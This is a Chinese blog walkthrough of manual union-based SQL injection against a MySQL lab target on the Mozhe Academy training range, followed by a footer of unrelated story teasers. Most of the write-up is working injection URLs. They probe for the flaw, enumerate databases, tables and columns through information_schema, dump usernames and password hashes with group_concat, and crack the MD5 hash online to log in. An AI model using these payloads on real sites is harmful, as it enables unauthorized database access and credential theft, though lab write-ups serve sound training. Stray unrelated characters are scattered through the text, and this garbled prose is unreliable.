SQL手工注入漏洞測(cè)試(MySQL數(shù)據(jù)庫(kù))

使用墨者學(xué)院靶場(chǎng)測(cè)試

先瀏覽頁(yè)面判斷存在注入 >查長(zhǎng)度>查數(shù)據(jù)庫(kù)>查表>查字段>查數(shù)據(jù)數(shù)量>查用戶+密碼>解密登錄 找不到可注入點(diǎn)可以觀察網(wǎng)頁(yè)是否可以跳轉(zhuǎn)到其他頁(yè)面德谅,并重新尋找注入點(diǎn)账胧,查詢的時(shí)候盡量使用group_concat()防止漏數(shù)據(jù)。

(1. 登錄頁(yè)面沒有賬號(hào)密碼,只能暴破或者SQL注入數(shù)據(jù)庫(kù)查看帳號(hào)密碼 2. 發(fā)現(xiàn)公告中存在注入點(diǎn) 3. 通過數(shù)據(jù)庫(kù)函數(shù)和顯示位查看數(shù)據(jù)庫(kù)版本信息、數(shù)據(jù)庫(kù)名 4. 爆數(shù)據(jù)庫(kù)表名 5. 暴數(shù)據(jù)庫(kù)列名 6. 輸出帳號(hào)密碼列(使用group_concat()函數(shù)) 7. 發(fā)現(xiàn)密碼有點(diǎn)像MD5加密,去解密下 8.登錄帳號(hào)和解密后的密碼 9.獲取key)

1桃熄、尋找注入點(diǎn) “id=1 and 1=1 ”或者“id=1 and 1=2 ”,1=2時(shí)彈出錯(cuò)誤證明是注入點(diǎn):

id=0 union select 1,2,3,4 (2回顯字段)

2型奥、判斷注入類型(數(shù)字型瞳收、字符型)
3、order by x判斷列的數(shù)量(4字段)
4厢汹、聯(lián)合查詢 union select 判斷2,3存在回顯
5螟深、查數(shù)據(jù)庫(kù)名和用戶名:

//124.70.22.208:44067/new_list.php?id=0 union select 1,database(),user(),4

6、查版本和系統(tǒng):

//124.70.22.208:44067/new_list.php?id=0 union select 1,version(),@@version_compile_os,4

image.png

查出數(shù)據(jù)庫(kù)版本在5.0以上可以使用內(nèi)置庫(kù)

7烫葬、查表名:

://124.70.22.208:44067/new_list.php?id=0 union select 1,table_name,3,4 from information_schema.tables where table_schema="mozhe_Discuz_StormGroup"

8界弧、使用group_concat(table_name)查詢所有的表名:

://124.70.22.208:44067/new_list.php?id=0 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema="mozhe_Discuz_StormGroup"

9、查出某表中所有列名

//124.70.22.208:48927/new_list.php?id=0 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

10搭综、查出該表需要的列的具體值

//124.70.22.208:48927/new_list.php?id=0 union select 1,name,password,4 from StormGroup_member limit 0,1

經(jīng)測(cè)試不對(duì)垢箕!可能是其它行的賬號(hào)。

11兑巾、那就用group_concat查出所有行的數(shù)據(jù)

//124.70.22.208:48927/new_list.php?id=0 union select 1,1,group_concat(name),group_concat(password),4 from StormGroup_member

原來有兩行數(shù)據(jù)条获,測(cè)試第二個(gè)才對(duì)。

12蒋歌、將密文到https://www.cmd5.com/查詢帅掘,結(jié)果就是密碼:
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 人面猴
    序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市堂油,隨后出現(xiàn)的幾起案子修档,更是在濱河造成了極大的恐慌,老刑警劉巖府框,帶你破解...
    沈念sama閱讀 206,968評(píng)論 6 482
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件萍悴,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡寓免,警方通過查閱死者的電腦和手機(jī)癣诱,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,601評(píng)論 2 382
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來袜香,“玉大人撕予,你說我怎么就攤上這事◎谑祝” “怎么了实抡?”我有些...
    開封第一講書人閱讀 153,220評(píng)論 0 344
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)欢策。 經(jīng)常有香客問我吆寨,道長(zhǎng),這世上最難降的妖魔是什么踩寇? 我笑而不...
    開封第一講書人閱讀 55,416評(píng)論 1 279
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任啄清,我火速辦了婚禮,結(jié)果婚禮上俺孙,老公的妹妹穿的比我還像新娘辣卒。我一直安慰自己,他們只是感情好睛榄,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,425評(píng)論 5 374
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布荣茫。 她就那樣靜靜地躺著,像睡著了一般场靴。 火紅的嫁衣襯著肌膚如雪啡莉。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,144評(píng)論 1 285
  • 城市分裂傳說
    那天旨剥,我揣著相機(jī)與錄音咧欣,去河邊找鬼。 笑死泞边,一個(gè)胖子當(dāng)著我的面吹牛该押,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播阵谚,決...
    沈念sama閱讀 38,432評(píng)論 3 401
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼蚕礼,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來了梢什?” 一聲冷哼從身側(cè)響起奠蹬,我...
    開封第一講書人閱讀 37,088評(píng)論 0 261
  • 萬(wàn)榮殺人案實(shí)錄
    序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎嗡午,沒想到半個(gè)月后囤躁,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,586評(píng)論 1 300
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,028評(píng)論 2 325
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年狸演,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了言蛇。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,137評(píng)論 1 334
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡宵距,死狀恐怖腊尚,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情满哪,我是刑警寧澤婿斥,帶...
    沈念sama閱讀 33,783評(píng)論 4 324
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布,位于F島的核電站哨鸭,受9級(jí)特大地震影響民宿,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜像鸡,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,343評(píng)論 3 307
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一活鹰、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧坟桅,春花似錦华望、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,333評(píng)論 0 19
  • 一樁弒父案赖舟,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至夸楣,卻和暖如春宾抓,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背豫喧。 一陣腳步聲響...
    開封第一講書人閱讀 31,559評(píng)論 1 262
  • 情欲美人皮
    我被黑心中介騙來泰國(guó)打工石洗, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人紧显。 一個(gè)月前我還...
    沈念sama閱讀 45,595評(píng)論 2 355
  • 代替公主和親
    正文 我出身青樓讲衫,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親孵班。 傳聞我的和親對(duì)象是個(gè)殘疾皇子涉兽,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,901評(píng)論 2 345

推薦閱讀更多精彩內(nèi)容